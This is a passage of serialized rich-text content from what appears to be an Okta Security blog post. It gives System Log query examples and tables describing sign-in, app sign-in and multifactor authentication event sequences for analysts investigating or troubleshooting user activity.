IP.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We are often asked to provide some sort of \\\"cheat sheet\\\" for new analysts that are unfamiliar with the extensive library of events available in Okta's Event Library.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The following blog post re-publishes a support article that offers a few of these shortcuts. 
Okta Security has also \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"published a range of platform and bespoke detections\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for identifying suspicious activity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The events below are found in both Okta Classic Engine (OCE) and Okta Identity Engine (OIE).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Working with Okta System Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To access the System Log, go to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Reports\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" > \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"System Log\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view events in the System Log, type or paste a query into the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Search\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" field on the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"System Log\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" page, and press \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Enter\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search events by 
user\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view sign-in events for a particular user, use this query as an example. Replace the <enter user id> in this example with a User ID.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can find the User ID for a given user by navigating to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Directory > People\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", searching by name and selecting the user. The User ID is appended to the end of the resulting URL:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://<Okta org URL>/admin/user/profile/view/<User ID>\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(actor.id eq \\\"<enter user id>\\\" or target.id eq \\\"<enter user id>\\\") and (\\n(eventType eq \\\"user.session.start\\\") or\\n(eventType eq \\\"policy.evaluate_sign_on\\\") or\\n(eventType eq \\\"user.authentication.verify\\\") or\\n(eventType eq \\\"application.policy.sign_on.deny_access\\\") or\\n(eventType eq \\\"user.authentication.sso\\\") or\\n(eventType eq \\\"user.authentication.auth_via_mfa\\\") or\\n(eventType eq \\\"user.mfa.factor.activate\\\") or\\n(eventType eq \\\"system.push.send_factor_verify_push\\\") or\\n(eventType eq \\\"system.email.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_phone_verification_message\\\") or\\n(eventType eq \\\"system.voice.send_mfa_challenge_call\\\") or\\n(eventType eq \\\"system.voice.send_phone_verification_call\\\") or\\n(eventType eq \\\"system.email.password_reset.sent_message\\\") or\\n(eventType eq 
\\\"system.sms.send_password_reset_message\\\") or\\n(eventType eq \\\"system.voice.send_password_reset_call\\\") or\\n(eventType eq \\\"user.account.reset_password\\\") or\\n(eventType eq \\\"user.account.update_password\\\") or\\n(eventType eq \\\"system.email.account_unlock.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_account_unlock_message\\\") or\\n(eventType eq \\\"system.voice.send_account_unlock_call\\\") or\\n(eventType eq \\\"user.account.unlock_token\\\") or\\n(eventType eq \\\"user.account.unlock\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To learn more about each event in this query, refer to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"#definitions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Definitions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" table below for more information.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search events by IP address\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view user sign-in events associated with a particular IP address, replace \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"<enter ip address here>\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" with an IP address.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(client.ipAddress eq \\\"<enter ip address here>\\\") and (\\n(eventType eq \\\"user.session.start\\\") or\\n(eventType eq \\\"policy.evaluate_sign_on\\\") or\\n(eventType eq \\\"user.authentication.verify\\\") or\\n(eventType eq \\\"application.policy.sign_on.deny_access\\\") or\\n(eventType eq \\\"user.authentication.sso\\\") or\\n(eventType eq 
\\\"user.authentication.auth_via_mfa\\\") or\\n(eventType eq \\\"user.mfa.factor.activate\\\") or\\n(eventType eq \\\"system.push.send_factor_verify_push\\\") or\\n(eventType eq \\\"system.email.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_phone_verification_message\\\") or\\n(eventType eq \\\"system.voice.send_mfa_challenge_call\\\") or\\n(eventType eq \\\"system.voice.send_phone_verification_call\\\") or\\n(eventType eq \\\"system.email.password_reset.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_password_reset_message\\\") or\\n(eventType eq \\\"system.voice.send_password_reset_call\\\") or\\n(eventType eq \\\"user.account.reset_password\\\") or\\n(eventType eq \\\"user.account.update_password\\\") or\\n(eventType eq \\\"system.email.account_unlock.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_account_unlock_message\\\") or\\n(eventType eq \\\"system.voice.send_account_unlock_call\\\") or\\n(eventType eq \\\"user.account.unlock_token\\\") or\\n(eventType eq \\\"user.account.unlock\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Search events by External Session ID\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"all\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" events associated with a particular user session, replace <enter external session id here> with an External Session ID.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(authenticationContext.externalSessionId eq \\\"<enter external session id 
here>\\\")\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To only view \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"sign-on events\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" associated with a particular user session, replace <enter external session id here> with an External Session ID.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(authenticationContext.externalSessionId eq \\\"<enter external session id here>\\\") and (\\n(eventType eq \\\"user.session.start\\\") or\\n(eventType eq \\\"policy.evaluate_sign_on\\\") or\\n(eventType eq \\\"user.authentication.verify\\\") or\\n(eventType eq \\\"application.policy.sign_on.deny_access\\\") or\\n(eventType eq \\\"user.authentication.sso\\\") or\\n(eventType eq \\\"user.authentication.auth_via_mfa\\\") or\\n(eventType eq \\\"user.mfa.factor.activate\\\") or\\n(eventType eq \\\"system.push.send_factor_verify_push\\\") or\\n(eventType eq \\\"system.email.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_factor_verify_message\\\") or\\n(eventType eq \\\"system.sms.send_phone_verification_message\\\") or\\n(eventType eq \\\"system.voice.send_mfa_challenge_call\\\") or\\n(eventType eq \\\"system.voice.send_phone_verification_call\\\") or\\n(eventType eq \\\"system.email.password_reset.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_password_reset_message\\\") or\\n(eventType eq \\\"system.voice.send_password_reset_call\\\") or\\n(eventType eq \\\"user.account.reset_password\\\") or\\n(eventType eq \\\"user.account.update_password\\\") or\\n(eventType eq \\\"system.email.account_unlock.sent_message\\\") or\\n(eventType eq \\\"system.sms.send_account_unlock_message\\\") or\\n(eventType eq \\\"system.voice.send_account_unlock_call\\\") or\\n(eventType eq 
\\\"user.account.unlock_token\\\") or\\n(eventType eq \\\"user.account.unlock\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"View logout events for a user\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To view user sign-out events associated with a particular user, replace <enter user id> with a User ID.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(actor.id eq \\\"<enter user id>\\\" or target.id eq \\\"<enter user id>\\\") and (\\n(eventType eq \\\"user.session.end\\\") or\\n(eventType eq \\\"user.authentication.slo\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"View MFA configuration changes for a user\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To identify any changes to authenticators associated with a particular user, replace <enter user id> with a User ID.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"(actor.id eq \\\"<enter user id>\\\" or target.id eq \\\"<enter user id>\\\") and (\\n(eventType eq \\\"user.mfa.factor.activate\\\") or\\n(eventType eq \\\"user.mfa.factor.deactivate\\\") or\\n(eventType eq \\\"user.mfa.factor.reset_all\\\") or\\n(eventType eq \\\"user.mfa.factor.suspend\\\") or\\n(eventType eq \\\"user.mfa.factor.unsuspend\\\") or\\n(eventType eq \\\"user.mfa.factor.update\\\")\\n)\",\"marks\":[{\"type\":\"code\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Share a link to System Log 
reports\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can also share a link to a System Log query with your team members so they can view the same events in the System Log.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After you have run a query and viewed the events in the System Log, copy the link in the URL field of your browser and paste it into a message to your colleagues.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event Scenarios\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Troubleshooting sign-on events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sign in to Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When a user signs in to Okta, you’ll see the following sequence of 
events:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Order\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.session.start\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the first authentication method is verified. 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"policy.evaluate_sign_on\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the Okta Sign-On Policy/Global Session Policy is evaluated and contains the result of the policy evaluation.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log#mfa\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a policy requires multifactor authentication (MFA), you’ll see various MFA enrollment or verification-related events. 
See the\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log#mfa\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multifactor authentication section\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"for details on those events.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.authentication.verify\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the user has successfully completed the sign-in flow. At this point, a valid session should have been established for the user.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-5\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Sign in to an app\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once a user has established a session, they are (usually) then able to view a dashboard of available applications. 
There is no System Log event for when a user clicks an app tile to start the sign-in to that app. Instead, two sequences of events fire based on whether the sign-in to the app was successful or not.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In successful app sign-in attempts, the following events are triggered:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Order\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log#mfa\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multifactor Authentication events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a policy requires MFA, you’ll see various MFA enrollment or 
verification-related events. See the\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/02/user-sign-and-recovery-events-okta-system-log#mfa\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multifactor authentication section\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"for details on those events.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.authentication.sso\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the user meets all the requirements to access the app.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In unsuccessful app sign-in attempts, the following event is 
triggered:\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Order\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"application.policy.sign_on.deny_access\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired if the user doesn’t meet the requirements to access the app.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. 
Review Multifactor Authentication Events\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When any policy (Sign-On Policy/Global Session Policy/App Sign-On Policy) requires MFA, you should expect a number of the following events.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"First there are those events that fire irrespective of the authenticator in question:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Order\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.authentication.auth_via_mfa\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This event is fired after the user attempts to verify their identity using an MFA 
factor/authenticator.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"user.mfa.factor.activate\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user doesn’t have any MFA factors/authenticators enrolled, or is missing a required MFA factor/authenticator, the sign-in flow will force the user to enrol them. This event is fired after the user successfully enrols an MFA factor/authenticator.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Specific MFA factors/authenticators also fire additional events that indicate progress of the verification 
flow:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Description\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.push.send_factor_verify_push\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When using the Okta Verify Push factor/authenticator, this event is fired when Okta sends the push notification to the user’s device. 
\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.email.send_factor_verify_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When using the Email MFA factor/authenticator, this event is fired when Okta sends a message with a one-time password (OTP) code to the user via email.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"system.sms.send_phone_verification_message\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When 